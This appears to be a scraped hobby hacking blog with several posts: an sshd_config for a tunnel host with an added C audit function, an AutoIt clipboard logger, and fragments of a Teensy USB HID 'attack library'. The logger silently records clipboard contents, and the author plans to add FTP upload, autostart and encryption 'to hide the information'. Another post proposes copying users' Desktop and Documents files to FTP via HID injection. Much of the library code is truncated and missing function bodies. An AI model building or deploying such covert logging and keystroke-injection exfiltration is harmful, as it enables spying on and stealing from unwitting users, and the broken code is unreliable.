#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
# Change to NO to enable built-in password authentication.
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
X11DisplayOffset 10
X11UseLocalhost yes
PrintLastLog yes
TCPKeepAlive yes
PermitTunnel yes
# override default of no subsystems
Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config
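As an added check (my own code, not from this post), here is a small auditor for the directives above: it parses sshd_config text the way sshd does (the first occurrence of a keyword wins, # starts a comment) and reports every expectation that is not met. The expected values are my choice for a SOCKS-proxy host once key-based login works; the Part I config leaves PasswordAuthentication yes until the keys are created, so it is reported as a finding. Protocol is not checked because current OpenSSH only speaks version 2 and treats the keyword as deprecated.

```c
/* Added example: audit sshd_config text against a hardening baseline (not the post's code). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* A directive we expect and the value it should have. sshd keywords are
 * case-insensitive; values are compared case-insensitively too. */
struct expectation { const char *keyword; const char *value; };

/* Baseline for a tunnel host after key-based login is working (my choice). */
static const struct expectation expected[] = {
    { "PermitRootLogin",        "no"  },
    { "PubkeyAuthentication",   "yes" },
    { "PasswordAuthentication", "no"  },
    { "PermitEmptyPasswords",   "no"  },
};

/* Split one config line into keyword and value; returns 0 for blank/comment lines. */
static int parse_line(const char *line, char *key, size_t klen, char *val, size_t vlen)
{
    while (isspace((unsigned char)*line)) line++;
    if (*line == '\0' || *line == '#') return 0;
    size_t i = 0;
    while (*line && !isspace((unsigned char)*line) && *line != '=' && i < klen - 1)
        key[i++] = *line++;
    key[i] = '\0';
    while (isspace((unsigned char)*line) || *line == '=') line++;
    i = 0;
    while (*line && *line != '\n' && *line != '\r' && i < vlen - 1)
        val[i++] = *line++;
    while (i > 0 && isspace((unsigned char)val[i - 1])) i--;
    val[i] = '\0';
    return key[0] != '\0';
}

/* Audit sshd_config text; returns the number of expectations not met.
 * Later duplicates of a keyword are ignored (sshd uses the first value),
 * and a keyword that never appears is reported as "default in effect". */
int audit_sshd_config(const char *text)
{
    const size_t n = sizeof expected / sizeof expected[0];
    int seen[sizeof expected / sizeof expected[0]] = {0};
    int failures = 0;
    char line[1024], key[128], val[512];
    const char *p = text;
    while (*p) {
        size_t len = strcspn(p, "\n");
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += len;
        if (*p == '\n') p++;
        if (!parse_line(line, key, sizeof key, val, sizeof val)) continue;
        for (size_t k = 0; k < n; k++) {
            if (seen[k] || strcasecmp(key, expected[k].keyword) != 0) continue;
            seen[k] = 1;
            if (strcasecmp(val, expected[k].value) != 0) {
                fprintf(stderr, "%s is \"%s\", expected \"%s\"\n",
                        expected[k].keyword, val, expected[k].value);
                failures++;
            }
        }
    }
    for (size_t k = 0; k < n; k++) {
        if (!seen[k]) {
            fprintf(stderr, "%s not set, sshd default in effect\n", expected[k].keyword);
            failures++;
        }
    }
    return failures;
}
```

Feed it the file contents and treat any non-zero return as a finding; because sshd honours the first occurrence, a hardened value added at the bottom of the file below an older permissive one does nothing, which is exactly the case this check catches.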

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an executable of approximately 300KB that runs on your computer, logging clipboard data to a text file at %USERPROFILE%\ClipLog.log
  1. Download Autoit from
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0

#include <File.au3>
#include <Clipboard.au3>

Global $txtClipboard = ""   ; last clipboard text written to the log

While 1
	$Clippy = _ClipBoard_GetData()
	If $Clippy <> "0" Then
		If $Clippy <> $txtClipboard Then
			_FileWriteLog(@UserProfileDir & "\ClipLog.log", $Clippy)
			$txtClipboard = $Clippy   ; remember it so the same text is not logged twice
		EndIf
	EndIf
	Sleep(500)   ; poll twice a second instead of spinning
WEnd

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h:

#include <n3onli8.h>

void AltF(){

void setup(){
  Minimize(); //Restoring Windows GUI+D

void loop(){

n3onli8.h Advanced PHUKD Library Complete

I have finally completed building the n3onli8.h Teensy library for HID attacks. I want to call this version 0.1 since I have big plans for this library. Hope you enjoy it:



#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();



#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);

void StartRUN()


void Enter()

void PrintScreen()

void Minimize()


void Menu()
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);

void AltF4()


void Paste(){

void Save(){

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.

Creating the attack Library... "n3onli8.h"

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()

void StartRUN()



void Enter()

Check out n3onli8.cpp on @pastebin.
Save the .h and .cpp files in a folder called n3onli8 in arduino-0022\arduino-0022\libraries\
Please note the numbers may vary with your version of the Arduino SDK.

Send me your ideas on library functions.

Teensy Hacker ++

Earlier this year at Defcon I was introduced to the world of exploiting human interface devices (HID). At first I was wowed by the simplicity of the attack. I could not wait to get my hands on my first Teensy from
Initial issues with the board:
  1. Comes with a Mini-USB connector. (Creates suspicion; a USB drive looks like a tool)
  2. Not enough on board memory to carry payload.
  3. On first run, depending on the system it's being plugged into, there can be a fair bit of delay while the drivers initialize, which means the code may start executing before the keyboard is ready and the exploit is a FAIL!
Initial usage for Teensy:
  1. Prank tool: Mess with Desktop, random key strokes...You get the point
  2. Copy files from "Desktop" or "My Documents" to ftp
  3. Use PowerShell to wreak havoc!

Next Post: I will be putting up some code for the Teensy...